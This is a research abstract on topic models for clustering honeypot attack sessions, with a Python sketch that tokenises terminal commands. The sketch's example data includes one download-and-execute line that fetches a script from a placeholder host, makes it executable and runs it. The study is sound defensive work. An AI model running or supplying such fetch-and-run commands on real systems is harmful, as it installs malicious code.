Cyber-systems are under near-constant threat from intrusion attempts. Attack types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks that appear to share a common intent is therefore valuable to threat-hunting experts. This article explores topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. Clustering the sessions has two main practical uses: finding groups of similar attacks, and identifying outliers. A range of statistical topic models is considered, each adapted to the structure of command-line syntax. In particular, the concepts of primary and secondary topics, and then of session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow an unbounded vocabulary size and an unbounded number of latent intents. The methods are shown to discover an unusual MIRAI variant that attempts to take over existing cryptocurrency coin-mining infrastructure and that traditional topic-modelling approaches do not detect.
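To make the session-level and command-level structure concrete, the following minimal sketch shows one way a raw terminal session could be split into commands and then into words before a topic model is fitted. The abstract does not specify a tokenisation scheme, so the separator set (`;`, `|`, `||`, `&&`, newline), the function names `tokenize_session` and `word_counts`, and the two example sessions are all assumptions made for illustration, not the authors' preprocessing.

```python
import re
from collections import Counter
from typing import Iterable, List

# Assumed command separators: ';', '|', '||', '&&' and newlines.
# '||' is listed before '|' so the two-character operator matches first.
COMMAND_SEP = re.compile(r"\s*(?:;|\|\||&&|\||\n)\s*")


def tokenize_session(session: str) -> List[List[str]]:
    """Split a session into commands, and each command into words."""
    commands = [c for c in COMMAND_SEP.split(session.strip()) if c]
    return [c.split() for c in commands]


def word_counts(sessions: Iterable[str]) -> Counter:
    """Count word occurrences over all commands of all sessions."""
    counts: Counter = Counter()
    for session in sessions:
        for command in tokenize_session(session):
            counts.update(command)
    return counts


# Invented example sessions (not taken from any honeypot data).
sessions = [
    "cd /tmp; wget http://example.invalid/bot.sh; chmod 777 bot.sh; sh bot.sh",
    "cat /proc/cpuinfo | grep name",
]

for s in sessions:
    print(tokenize_session(s))
print(word_counts(sessions).most_common(3))
```

The nested list keeps the session, command, and word levels separate, which is the shape a model with both session-level and command-level topics would need as input. A flat bag of words per session, as used by a standard topic model, can be recovered by concatenating the inner lists.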